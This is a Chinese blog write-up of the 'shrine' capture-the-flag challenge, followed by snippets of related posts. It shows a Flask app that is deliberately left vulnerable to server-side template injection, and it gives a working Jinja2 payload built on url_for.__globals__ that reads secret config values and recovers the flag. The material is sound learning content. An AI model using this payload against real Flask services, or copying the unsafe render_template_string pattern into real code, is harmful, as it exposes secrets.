攻防世界 shrine

最新推荐文章于 2024-10-18 19:15:00 发布
最新推荐文章于 2024-10-18 19:15:00 发布
阅读量542 收藏 8
点赞数 12
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63640108/article/details/139528236
版权

题目打开就是源码


import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

app.config['FLAG'] = os.environ.pop('FLAG')

明确目标 FLAG在应该config['FLAG']中

代码审计一下

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

当用户访问形如 /shrine/something 的路径时,调用了safe_jinja替换了左右括号 '('  ')'  设置了黑名单'config' 'self' 尝试了url编码没用

payload形式  http://61.147.171.105:58049/shrine/something

感觉像是模板注入尝试了一下简单判断

到这不知道怎么下手了 看了WP

使用Python内置函数读取全局变量   url_for或者get_flashed_messages

url/shrine/{{url_for.__globals__}}

current_app: 当前的 Flask 应用实例,可以通过它访问应用的配置、路由、模板等。

python沙箱逃逸的方法是 利用python对象之间的引用关系来调用被禁用的函数对象

构造payloads:   /shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

flag{shrine_is_good_ssti}

沙箱逃逸的例子

璃怜月
关注
【网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 4001
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序中,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask 中,url_for 函数是定义在 Flask 的全局命名空间中的
攻防世界shrine
weixin_73399382的博客
07-12 334
flask模版注入加沙盒逃逸,触及到知识盲区了,直接看这篇文章吧。
攻防世界 shrine 详解
xmj818719的博客
03-29 1920
打开题目 整理源码 代码审计: 目标 config['FLAG'] 过滤了 config,self 这两个函数的过滤没看懂,总之好像也没过滤掉(应该是过滤了后面的变量),圆括号是彻底的被过滤掉了,URL编码都没用(刚开始想测试XSS来着) 做完后,拿编译器跑了一下带config的payload也没发现过滤 回归正题 2个@app.route 为路由 第一个是 / 使用URL/ 可访问index()也就是刚刚开始显示的源码 第二个...
攻防世界shrine
wangzhemvp的博客
04-05 253
(2)blacklist = ['config', 'self']:黑名单,但flag在config文件里。(1)app.config['FLAG']:把FLAG放到app里。(一般ctf把flag藏在config里);如果config,self不能使用,就用。如果没有黑名单,直接用。
攻防世界-shrine
MILLOPE的博客
10-14 228
题目 传送门 WP 打开题目 有一段代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s):
攻防世界 shrine 解题思路
xj28555的博客
07-15 2301
进入题目 发现一串源代码,但是不规则,所以我们ctrl+u查看源代码 这样就整理好了代码,接下来就是审计代码了。我们来看看这个代码都写了啥。 首先导入了两个模块,一个flask,一个os。 然后用app.route装饰器传了两个路径 那我们访问一下这个路径 发现shrine后面的内容会被显示到浏览器上,那我我们可以试试是否存在模板注入构造payload /shrine/{{2*2}} 发现进行了运算,那么可以判断这里是存在SSTI的。关于SSTI模板注入前面也碰到了不
攻防世界shrine 模板注入
qq_43774856的博客
12-16 351
shrine 打开链接,这里直接给出了源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def
攻防世界----shrine
qq_44418229的博客
07-14 845
Flask的payload集合
攻防世界 web进阶区 shrine
m0_51395584的博客
06-22 414
攻防世界 web进阶区 shrine python的flask框架代码审计,以及相关漏洞利用
攻防世界-shrine题分析
weixin_46784800的博客
11-21 994
shrine 题目分析 进入靶场后可以看见给出了源码,比较乱的话可以 ctrl+u查看源码: 进行代码审计可以发现,这个网页是用flask模板写的,这时就很容易就联想到flask模板注入 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read()
攻防世界web进阶区shrine
gongjingege的博客
07-31 579
打开链接,查看源码 代码审计 看见了flask,考虑模板注入,@app.route后跟着路径,还有一部分过滤 试一下 /shrine/{{1+1}},回显为2,确实是ssti app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个config,flag应该就在这里面,本来可以直接查看{{config}},但后面代码存在过滤 def safe_jinja(s): s = s.replace('(', '').replace(')', '')
攻防世界】十七 --- shrine --- SSTI
qq_43168364的博客
12-28 476
题目 — shrine 一、writeup 二、知识点
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 504
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-18 520
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
最新发布
2401_85027336的博客
10-18 660
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】1,600$:Auth0 错误配置
等风来
10-13 311
Auth0 是一个广泛用于网站和应用程序的身份验证平台,负责管理用户身份并确保其服务的安全访问。该平台提供了多种工作流程,以无缝集成登录和注册流程。
网络安全公司及其主要产品介绍
xixixi7777的博客
10-13 472
各大安全公司提供的网络安全产品针对不同的企业需求和网络架构,涵盖从端点安全、网络安全到云安全的全方位解决方案。在选择网络安全产品时,企业应结合自身的网络规模、威胁类型和业务需求,选择适合的产品组合,以建立健全的网络安全体系。Huawei Cyber Security Intelligence System(CIS):基于大数据的安全智能平台,支持安全威胁的早期检测和响应。FireEye Helix:集成SIEM和安全运营中心功能的安全管理平台,提供集中化的威胁管理和自动化响应。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1397
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。
网络安全(黑客)——自学2024
2401_85026883的博客
10-14 1528
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2010年全面解读Java教程:从基础知识到进阶应用
- Java编程环境设置,如1.2中的`Java䈝䀰Ⲵ⢩ Shrine`,讲述了JDK的安装和配置,以及Java开发环境的搭建。 - `Javaᓄ⭘࠶㊫`部分可能涉及类和对象的概念,以及面向对象编程的基石。 2. 进阶主题: - Java高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值